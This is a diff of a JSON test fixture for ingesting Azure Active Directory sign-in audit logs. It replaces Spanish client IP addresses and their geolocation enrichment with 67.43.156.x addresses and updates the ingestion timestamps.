@@ -5553,12 +4821,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051615600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970283500Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -5597,22 +4865,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 16299, - "organization": { - "name": "XFERA Moviles S.A." - } - }, - "ip": "37.29.234.179" + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -5626,7 +4879,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -5676,7 +4929,7 @@ "asr" ], "ip": [ - "37.29.234.179" + "67.43.156.14" ] }, "organization": { 
@@ -5688,12 +4941,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "37.29.234.179", - "ip": "37.29.234.179" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-06-17T07:32:46.051618500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970288400Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -5732,25 +4985,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5764,7 +4999,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -5814,7 +5049,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -5826,12 +5061,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051656900Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970293300Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -5870,25 +5105,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5902,7 +5119,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Success", @@ -5952,7 +5169,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -5964,12 +5181,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051662700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970297Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -6008,25 +5225,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6040,7 +5239,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -6078,7 +5277,7 @@ }, "related": { "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -6090,12 +5289,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051666100Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970301400Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -6131,25 +5330,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6163,7 +5344,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -6213,7 +5394,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -6225,12 +5406,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051671500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970307100Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,